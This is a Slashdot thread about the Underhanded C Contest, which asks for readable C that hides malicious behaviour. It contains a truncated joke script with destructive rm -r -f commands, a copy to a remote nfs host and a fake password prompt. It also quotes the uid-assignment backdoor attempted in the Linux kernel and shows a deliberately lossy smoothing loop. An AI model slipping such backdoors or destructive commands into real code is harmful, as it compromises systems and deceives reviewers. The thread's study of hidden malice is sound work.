The First Annual Underhanded C Contest
Xcott Craver writes "We have just announced a new annual contest, the Underhanded C Contest, to write clear, readable, innocent-looking C code that implements malicious behavior. The object is to hide evil functionality that survives visual inspection of the source. The prize is beer."
RTFA, please.
The challenge for the first UCC is to write a simple program that performs some basic image-processing operation, for example smoothing or resampling, but manages to conceal a unique imperceptible fingerprint in each image it opens.
The fingerprint should be different for every execution of the program. It doesn't have to have any particular meaning, but useful tracking information is worth extra points (tho getting caught is worth fewer points.) The print should be extractable from the output image by another program. Realistically, the detector will not have access to the original image for comparison purposes.
I seriously doubt that anyone could get arrested for writing something like this, dubious legal state or not.
I hear there's rumors on the Slashdots
Any open-source steganography programs
Why, yes! http://sourceforge.net/projects/steghide/
bash: rtfm: command not found
RTFA. The idea is to hide the malicious functions so that the source code looks innocent.
# cat
Damn, my RAM is full of llamas.
I mean I could do something like this:
# When do you want it done?
$today="sudo";
$yesterday="su -c";
# Define our globals
$superman="ls";
$wonderwoman="rm"
$bat
$aquaman="mv";
#define some important flags
$blows="-r";
$maims="-p";
$chunks="-f";
#define some targets
$your_mom="/";
$your_dad="/usr";
$your
$your_teacher="/bin";
$hell="/dev/n
$heaven="/dev/random";
$skyhigh="nfs://mys
#....later, back at Superfriends Headquarters
`$batman $blows $your_sister $skyhigh`;
`$wonderwoman $blows $chunks $on $your_sister`;
`$today $batman $and $your_mom $think $heaven $is $a $great $place $for $your_sister`;
#Would you like to see the rest of the story?
#print "Would you like to hear more? Please type your password to continue!";
The superfriends save the day again.
Karma: Chameleon (mostly due to the fact that you come and go).
For all you could possibly want to know about C, and more, check out this book (8M pdf). Those who want pure, uncommentaried, standard words can find them here.
Please check out the contest page: the "evil" behavior is not something java would prevent you from doing. We're not talking about crashing a computer or gaining root access, but performing a data processing task incorrectly. It's entirely problem state.
That being said, I chose C because it does permit more tricks along the lines of stack smashing and type mismatches. The winners of the obfuscated V contest used techniques like this to conceal their evil behavior, so I feel this would give people more freedom to get creative.
Finally, this is not meant to slam C, or open source, or any such like. I can't imagine how anyone can look at this contest and see it as an argument for less openness.
Xcott
1. "Invoking" the law is what you do in response to a violation.
2. You don't mod people down over Godwin's Law. You declare the argument over, and the person who tried to use nazis or Hitler to vilify their opponent is the loser. There is no "-1, Godwin" mod category, nor should there be.
3. You only mod jokes up as "Funny" or "Insightful" if they are, in fact, funny or insightful. Saying Free Beer doesn't lead to greater liberties because Hitler once gave some people free beer fails to either debunk the original point (which can still be true in other cases), and also fails to make anybody laugh.
So no mod points should be used on his post, so people can save them to mod down both your post and mine as "Offtopic."
"The day someone makes a knockoff of Slashdot that's a bit more computer-science oriented and isn't solely aimed at producing the same tired old trolling every day"
Have you seen Technocrat.net? Looks to be just starting, but I'm already impressed: slashdot ran an article on a nanotech textiles protest - technocrat ran one on a group of scientists demonstrating a refined iteration of a carbon nanotube CPU. Comments are on-topic too, touch wood.
(Or there's always ars for CS stuff, but they're hardly a /. knockoff.)
Is Google down? Okay, I updated the faq to tell you who we are.
Also, we never said anything about hackers. Nowhere have we associated hacking with malicious behavior. And I sincerely hope this will be a learning experience for all involved. I, in particular, will probably learn a thing or two about running next year's contest.
Xcott
Remember the recent Linux contamination
...
Something like:
if (blah || blah || uid=0) {
blah;
}
Just because it CAN be done, doesn't mean it should!
This reminds me about the attempt at inserting a backdoor in the linux kernel to gain root access. If they found out who did this, maybe he should get the free beer? ;)
The attempt was trying to insert
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
inside a function. Note that (current->uid = 0) is not testing but rather sets the UID to zero (and the surrounding brackets avoid the GCC warning).
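The behaviour of the quoted condition, shown as an added example that is not part of the original thread: the assignment both overwrites the UID and evaluates to 0, so the guarded branch never runs and only the side effect remains. `OPT_WCLONE`, `OPT_WALL`, `ERR_INVAL`, `struct task` and the function names are constructed stand-ins, not kernel code.

```c
#include <stdio.h>

/* Constructed stand-ins for __WCLONE, __WALL and the kernel's task struct. */
#define OPT_WCLONE 0x80000000u
#define OPT_WALL   0x40000000u
#define ERR_INVAL  22

struct task { unsigned uid; };

/* Quoted condition: "=" stores 0 into uid and the expression's value is 0. */
static int check_tampered(unsigned options, struct task *current)
{
    if ((options == (OPT_WCLONE | OPT_WALL)) && (current->uid = 0))
        return -ERR_INVAL;            /* unreachable: the assignment yields 0 */
    return 0;
}

/* Comparison as a reviewer would read it. The pointer-to-const parameter
   makes "current->uid = 0" a compile error instead of a silent write. */
static int check_intended(unsigned options, const struct task *current)
{
    if ((options == (OPT_WCLONE | OPT_WALL)) && (current->uid == 0))
        return -ERR_INVAL;
    return 0;
}

/* Run one variant as uid 1000 and report the uid left behind. */
static unsigned uid_after(int tampered, unsigned options)
{
    struct task t = { 1000 };
    if (tampered)
        check_tampered(options, &t);
    else
        check_intended(options, &t);
    return t.uid;
}

int main(void)
{
    unsigned both = OPT_WCLONE | OPT_WALL;
    printf("tampered, both flags: uid=%u\n", uid_after(1, both));
    printf("tampered, no flags:   uid=%u\n", uid_after(1, 0));
    printf("intended, both flags: uid=%u\n", uid_after(0, both));
    return 0;
}
```

Because `&&` short-circuits, the write only happens when the exact flag combination is passed, which is why ordinary callers would never notice it.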
You're just used to it. Problems: difficult to compile, difficult to convert to better languages (thank you preprocessor), encourages obfuscation, some constructs are clearly tacked on and/or poorly implemented (switch), arbitrary nonorthogonality (struct, parens and brace usage, pointer/array declaration), shitty strings. That's just off the top of my head.
http://support.microsoft.com/?kbid=311486
It was for DOS4GW but I think you're being pedantic.
Doesn't it make you feel good to know that our freedoms are protected by politicians, lawyers and journalists.
Actually I'm from upstate NY and have had a chance to try Ommegang beers; of the three that I've tried, all are excellent.
I've tried their Rare Vos, Hennepin, and self-named Ommegang beer: my favorite is the Rare Vos but I like them all.
- "Nobody came out that night, not one was ever seen. But Old Man Stauf is waiting there, crazy sick and mean!"
That's not very sneaky - it looks downright malicious. At the very least, who would run a program that launches a new fsck every five seconds? Even if the fs was read-only, you'll bring your system to a crawl in no time.
:) I can't wait to see the results.
What you really want is something more subtle. For example, here's an easy one using rounding errors in the core of a smoothing algorithm. Assumes a picture of width x height of type "RGB" (assumed to be a typedef'ed struct containing bytes r, g, and b) in a two-dimensional array called "picture" (and an equivalent one called "dest_picture").
for (int x=0; x<width; x++)
{
    const int next_x=(x+1==width ? 0 : x+1);
    const int prev_x=(x-1==-1 ? width-1 : x-1);
    for (int y=0; y<height; y++)
    {
        const int next_y=(y+1==height ? 0 : y+1);
        const int prev_y=(y-1==-1 ? height-1 : y-1);
        const RGB point1 = picture[prev_x][prev_y];
        const char point1_r = point1.r / 9;
        const char point1_g = point1.g / 9;
        const char point1_b = point1.b / 9;
        const RGB point2 = picture[x][prev_y];
        const char point2_r = point2.r / 9;
        const char point2_g = point2.g / 9;
        const char point2_b = point2.b / 9;
        // Etc - continue for 9 points from prev_x to next_x, prev_y to next_y
        const char dest_r = point1_r + point2_r + point3_r + point4_r + point5_r + point6_r + point7_r + point8_r + point9_r;
        const char dest_g = point1_g + point2_g + point3_g + point4_g + point5_g + point6_g + point7_g + point8_g + point9_g;
        const char dest_b = point1_b + point2_b + point3_b + point4_b + point5_b + point6_b + point7_b + point8_b + point9_b;
        dest_picture[x][y].r=dest_r;
        dest_picture[x][y].g=dest_g;
        dest_picture[x][y].b=dest_b;
    }
}
In case you didn't catch what it does, by dividing by nine before accumulating instead of afterwards, we're losing more color resolution. You'll never see values 253, 254, or 255, for example, in r, g, or b. There will also be a sawtooth pattern in what were initially smooth gradients on a per-channel basis (less noticeable when the image is viewed as a whole). It's not perfect, but it is a start. The possibilities really increase when doing things that add noise to an image; skewing a randomization function is trivially easy.
If you want to be really devious, though, you need to mess with program internals. Overflow a string to mess with your function's frame return parameter, for example. You could also do things like deliberately cause signals to be thrown that you catch. There's a lot of possibilities.
"This wallpaper is killing me. One of us has got to go." -- Oscar Wilde on his deathbed
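How an auditor could measure the precision loss described in the comment above, as an added example that is not part of the original thread: both filter orderings are run over every flat grey level and the surviving output levels are counted. It assumes a single channel and a constructed 3x3 neighbourhood; all names are hypothetical.

```c
#include <stdio.h>

typedef unsigned char byte;

/* Commenter's order: divide each sample by 9, then add (truncates 9 times). */
static byte smooth_divide_first(const byte n[9])
{
    unsigned sum = 0;
    for (int i = 0; i < 9; i++)
        sum += n[i] / 9;
    return (byte)sum;
}

/* Conventional order: add all nine samples, then divide once. */
static byte smooth_sum_first(const byte n[9])
{
    unsigned sum = 0;
    for (int i = 0; i < 9; i++)
        sum += n[i];
    return (byte)(sum / 9);
}

/* Feed every flat grey level 0..255 (constructed input) through a smoother.
   A correct box filter maps a flat area to itself, so 256 levels survive. */
static int distinct_levels(byte (*smooth)(const byte[9]), int *max_out)
{
    int seen[256] = {0}, count = 0;
    *max_out = 0;
    for (int v = 0; v < 256; v++) {
        byte n[9];
        for (int i = 0; i < 9; i++)
            n[i] = (byte)v;
        byte out = smooth(n);
        if (!seen[out]) { seen[out] = 1; count++; }
        if (out > *max_out) *max_out = out;
    }
    return count;
}

int main(void)
{
    int max;
    int levels = distinct_levels(smooth_divide_first, &max);
    printf("divide first: %d levels, max %d\n", levels, max);
    levels = distinct_levels(smooth_sum_first, &max);
    printf("sum first:    %d levels, max %d\n", levels, max);
    return 0;
}
```

On flat input the divide-first filter only emits multiples of 9, which is the sawtooth the comment describes and a histogram signature a reviewer can test for without reading the source.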
Any program that was able to do two things would pass: The ability to load remote information into memory and to begin execution of the loaded information.
A way to automatically find this would be to use an execution tracer that would alert you when the program's point of execution "left" its source code or allowed system APIs.
Shh.
You are correct. This is from ISO/IEC 9899:1999(E):
(emphasis added)
Are you really going to want to wait 100s of milliseconds for a garbage collector to run at arbitrary intervals in your carefully word aligned DMA transaction code that needs to run within a matter of microseconds?
Are you aware that the Linux kernel contains not just one, but two fully-functional tracing garbage collectors? There's one in JFS2 and another in the routing table/xform code.
Funny how people always get hung up about GC, when really it's all around them and they never even knew, because the flaws they thought it had don't exist.